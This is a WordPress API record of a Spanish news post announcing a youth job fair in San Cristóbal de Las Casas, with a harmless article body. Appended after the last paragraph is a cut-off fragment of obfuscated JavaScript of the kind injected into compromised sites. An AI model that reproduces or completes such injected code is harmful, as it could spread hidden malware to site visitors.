{"id":17049,"date":"2024-08-06T01:27:49","date_gmt":"2024-08-06T01:27:49","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17049"},"modified":"2024-08-06T01:27:50","modified_gmt":"2024-08-06T01:27:50","slug":"ofertaran-mas-de-250-puestos-en-feria-nacional-de-empleo-en-sclc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17049","title":{"rendered":"Ofertar\u00e1n m\u00e1s de 250 puestos en Feria Nacional de Empleo en SCLC"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"834\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240805-WA0017-834x1024.jpg\" alt=\"\" class=\"wp-image-17050\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240805-WA0017-834x1024.jpg 834w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240805-WA0017-244x300.jpg 244w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240805-WA0017-768x943.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240805-WA0017.jpg 1043w\" sizes=\"auto, (max-width: 834px) 100vw, 834px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>5 de agosto del 2024. San Crist\u00f3bal de Las Casas.- Este 6 de agosto se llevar\u00e1 a cabo la Feria Nacional de Empleo para la inclusi\u00f3n laboral de la juventud en el Centro de Convenciones Casa Mazariegos, donde casi 50 empresas estar\u00e1n ofertando un poco m\u00e1s de 250 puestos de trabajo.<\/p>\n\n\n\n<p>Francisco Calder\u00f3n Silva, director de Vinculaci\u00f3n de la Secretar\u00eda de Econom\u00eda y del Trabajo, inform\u00f3 en entrevista que el evento est\u00e1 dirigido especialmente a los j\u00f3venes que buscan una oportunidad para ingresar al mercado laboral. Calder\u00f3n Silva destac\u00f3 la importancia de la feria como una plataforma para fomentar la inclusi\u00f3n laboral en la regi\u00f3n y brindar a la juventud un acceso directo a diversas oportunidades de empleo.<\/p>\n\n\n\n<p>Los interesados en participar deber\u00e1n presentar varias solicitudes de empleo y copias de su identificaci\u00f3n oficial (INE). La feria promete ser un punto de encuentro crucial entre empleadores y j\u00f3venes, con el objetivo de reducir las barreras que dificultan el acceso al empleo para este sector de la poblaci\u00f3n.<\/p>\n\n\n\n<p>La Secretar\u00eda de Econom\u00eda y del Trabajo espera una asistencia significativa de j\u00f3venes de toda la regi\u00f3n, quienes tendr\u00e1n la oportunidad de postularse a las diversas vacantes disponibles y participar en entrevistas con las empresas presentes.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 5 de agosto del 2024. San Crist\u00f3bal de Las Casas.- Este 6 de agosto se llevar\u00e1 a cabo la Feria Nacional de Empleo para la inclusi\u00f3n laboral de la juventud en el Centro de Convenciones Casa Mazariegos, donde casi 50 empresas estar\u00e1n ofertando un poco m\u00e1s de 250 puestos de trabajo. Francisco &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17050,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-17049","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17049","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17049"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17049\/revisions"}],"predecessor-version":[{"id":17051,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17049\/revisions\/17051"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17050"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17049"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17049"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17049"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}